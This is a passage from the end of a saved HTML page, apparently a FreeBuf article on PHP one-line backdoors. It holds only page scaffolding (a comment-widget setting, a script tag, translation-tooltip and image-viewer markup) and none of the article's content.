	avatarSize		:'32',
	avatarPosition	:'left',
	anonymous		:'Anonymous'
};
/* ]]> */
</script>
<script type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-recentcomments-jquery.js.下载"></script>


<div style="position: static; width: 0px; height: 0px; border: none; padding: 0px; margin: 0px;"><div id="trans-tooltip"><div id="tip-left-top" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-left-top.png&quot;);"></div><div id="tip-top" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-top.png&quot;) repeat-x;"></div><div id="tip-right-top" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-right-top.png&quot;);"></div><div id="tip-right" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-right.png&quot;) repeat-y;"></div><div id="tip-right-bottom" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-right-bottom.png&quot;);"></div><div id="tip-bottom" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-bottom.png&quot;) repeat-x;"></div><div id="tip-left-bottom" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-left-bottom.png&quot;);"></div><div id="tip-left" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-left.png&quot;);"></div><div id="trans-content"></div></div><div id="tip-arrow-bottom" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-arrow-bottom.png&quot;);"></div><div id="tip-arrow-top" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-arrow-top.png&quot;);"></div></div><div class="highslide-container" style="padding: 0px; border: none; margin: 0px; position: absolute; left: 0px; top: 0px; width: 100%; z-index: 1001; direction: ltr;"><a class="highslide-loading" title="点击关闭" href="javascript:;" style="position: absolute; top: -9999px; opacity: 0.75; z-index: 1;">正在加载中...</a><div style="display: none;"></div><div class="highslide-viewport highslide-viewport-size" style="padding: 0px; border: none; margin: 0px; visibility: hidden;"></div><table cellspacing="0" style="padding: 0px; border: none; margin: 0px; visibility: hidden; position: absolute; border-collapse: collapse; width: 0px;"><tbody style="padding: 0px; border: none; margin: 0px;"><tr style="padding: 0px; border: none; margin: 0px; height: auto;"><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/outlines/rounded-white.png&quot;) 0px 0px; height: 20px; width: 20px;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/outlines/rounded-white.png&quot;) 0px -40px; height: 20px; width: 20px;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/outlines/rounded-white.png&quot;) -20px 0px; height: 20px; width: 20px;"></td></tr><tr style="padding: 0px; border: none; margin: 0px; height: auto;"><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/outlines/rounded-white.png&quot;) 0px -80px; height: 20px; width: 20px;"></td><td class="rounded-white highslide-outline" style="padding: 0px; border: none; margin: 0px; position: relative;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/outlines/rounded-white.png&quot;) -20px -80px; height: 20px; width: 20px;"></td></tr><tr style="padding: 0px; border: none; margin: 0px; height: auto;"><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/outlines/rounded-white.png&quot;) 0px -20px; height: 20px; width: 20px;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/outlines/rounded-white.png&quot;) 0px -60px; height: 20px; width: 20px;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;http://www.freebuf.com/buf/plugins/auto-highslide/images/graphics/outlines/rounded-white.png&quot;) -20px -20px; height: 20px; width: 20px;"></td></tr></tbody></table></div></body></html>